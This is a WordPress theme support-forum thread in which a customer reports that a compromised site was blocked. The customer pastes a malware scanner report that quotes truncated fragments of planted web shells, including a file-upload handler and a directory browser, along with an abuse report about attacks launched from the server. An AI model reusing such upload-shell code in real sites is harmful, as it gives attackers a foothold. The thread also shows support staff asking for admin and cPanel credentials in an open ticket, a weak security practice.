HomeSupport systemWordPressKuteShopVIRUSSS
  • Customer

    VIRUSSS

    Posted by: bregovski Jul 27, 2019 at 13:59 (5 year ago)

    Good day. On the server blocked the site, and gave a report.
    Not quite clear.
    Anything you need!
    Please urgently understand the situation

    Критические замечания
    Эти файлы могут быть вредоносными или хакерскими скриптами (57)
    Отображать по записейПоиск:
    Путь Изменение свойств Изменение содержимого Размер
    /var/www/useom.ru80/data/www/useom.ru/wp-content/themes/hikma/dbfile.php
    [x] 1…ader">';echo'' ;if($_POST['_upl']=="Upload"){if(copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};}
    25/07/2019 15:54:16
    25/07/2019 15:54:16
    878 b
    /var/www/useom.ru80/data/www/useom.ru/wp-content/uploads/kuteshop/.h..php
    [x] 1…){ $path=$_GET['path']; }else{ $path=getcwd(); } $path=str_replace('\\','/',$path); $paths=explode('/',$path); foreach($paths as$id=>$pat){ if($pat==''&&$id==0){ $a=true; echo '/'; continue; } if($pa
    25/07/2019 18:57:08
    25/07/2019 15:45:47
    7.64 Kb
    /var/www/useom.ru80/data/www/useom.ru/wp-content/themes/hikma/render-wp-links-opml.php
    [x] 1
  • Customer

    Posted by: bregovski, Jul 27, 2019 at 14:07 (5 year ago)

    /var/www/useom.ru80/data/www/useom.ru/wp-content/themes/hikma/dbfile.php
    [x] 1…ader">';echo'' ;if($_POST['_upl']=="Upload"){if(copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};}
    25/07/2019 15:54:16
    25/07/2019 15:54:16
    878 b
    /var/www/useom.ru80/data/www/useom.ru/wp-content/uploads/kuteshop/.h..php
    [x] 1…){ $path=$_GET['path']; }else{ $path=getcwd(); } $path=str_replace('\\','/',$path); $paths=explode('/',$path); foreach($paths as$id=>$pat){ if($pat==''&&$id==0){ $a=true; echo '/'; continue; } if($pa
    25/07/2019 18:57:08
    25/07/2019 15:45:47
    7.64 Kb
    /var/www/useom.ru80/data/www/useom.ru/wp-content/themes/hikma/render-wp-links-opml.php
    [x] 1
  • Customer

    Posted by: bregovski, Jul 28, 2019 at 17:51 (5 year ago)

    The IP address 185.105.226.235 (RU/Russia/sb969e2eb.fastvps-server.com) was found attacking wordpress on lvps83-169-44-105.dedicated.hosteurope.de 3 times in the last 3600 seconds.

    Attached is an X-ARF report (see http://www.x-arf.org/specification.html) and the original log report that triggered this block.

    Abuse Contact for 185.105.226.235: [abuse@fastvps.ru]

    The Abuse Contact of this report was provided by the Abuse Contact DB by abusix.com. abusix.com does not maintain the content of the database. All information which we pass out, derives from the RIR databases and is processed for ease of use. If you want to change or report non working abuse contacts please contact the appropriate RIR. If you have any further question, contact abusix.com directly via email (info@abusix.com). Information about the Abuse Contact Database can be found here:

    https://abusix.com/global-reporting/abuse-contact-db

    abusix.com is neither responsible nor liable for the content or accuracy of this message.
  • Customer

    Posted by: yame, Jul 29, 2019 at 01:00 (5 year ago)

    Hi mate,

    Could you please provide me your admin + cPanel account?

    Then I will send to my coder, he will check for you

    Regards,
    Yame
  • Customer

    Posted by: bregovski, Jul 29, 2019 at 06:36 (5 year ago)

    hi
  • Manager

    Posted by: yame, Jul 29, 2019 at 07:59 (5 year ago)

    I cannot reach into your admin account: http://prntscr.com/old6a1

    And it seems that your ftp account is not completed. I cannot access to

    Thanks!
  • Customer

    Posted by: bregovski, Jul 29, 2019 at 08:13 (5 year ago)


    Of course!
    Attacks occur from the site because it was blocked

    I can roll it back at the time when you installed the theme with demo content

    Only this is not a long time, since after the restoration of the attack resumed
  • Customer

    Posted by: bregovski, Jul 29, 2019 at 08:18 (5 year ago)


    Tell me how much to restore the server to what time? And I will do it for you, you just have 2 hours.
    Since I restored the server from a backup copy yesterday, a re-rollback is possible only after 15.31 Moscow time.
    22-5d3eabc2603fd.png
  • Manager

    Posted by: yame, Jul 29, 2019 at 10:00 (5 year ago)

    Hi,
    Pls contact to me via tf.kutethemes@gmail.com. I will support via mailbox for you, then I will receive your message timely.
    Thank you!
  • Customer

    Posted by: bregovski, Jul 29, 2019 at 12:53 (5 year ago)

    server restored
  • Manager

    Posted by: yame, Jul 30, 2019 at 01:29 (5 year ago)

    I got your message
  • Customer

    Posted by: bregovski, Jul 31, 2019 at 07:26 (5 year ago)


    Abnormal situation!
    How long will be without help and response. I gave the logs of scripts that are suspicious. And you are with me for 2 days. I correspond with the time zone.
  • Manager

    Posted by: yame, Jul 31, 2019 at 08:35 (5 year ago)

    Sorry I do not pay attention to ticket.

    I am still checking your issue via Gmail. Hope that we can help you to solve problem
  • Customer

    Posted by: bregovski, Aug 2, 2019 at 08:28 (5 year ago)

    Good day. I do not quite understand what is happening. What is the problem why you cannot solve this problem. Or is this vulnerability more serious than you can solve?
  • Manager

    Posted by: yame, Aug 6, 2019 at 01:39 (5 year ago)

    Your issue was solved via Email. So I will close this ticket

    For any questions, pls submit a new one then I will check for you

    Regards,
    Yame

INSTALLATION SERVICE

Theme Installation: $49. Pay now

CUSTOMIZED SERVICES

Use our expert service to turn your ideas into reality. Please send an email to kutethemes@gmail.com to provide the more detailed information. Thanks!

WORKING TIME

Our support service works from Monday to Friday.
Mean time (GMT +7):
+ 7:30 - 11:30 AM
+ 1:30 - 5:30 PM
We will try to answer all the questions within 24 hours and solve them as quickly as possible

FORUM CATEGORIES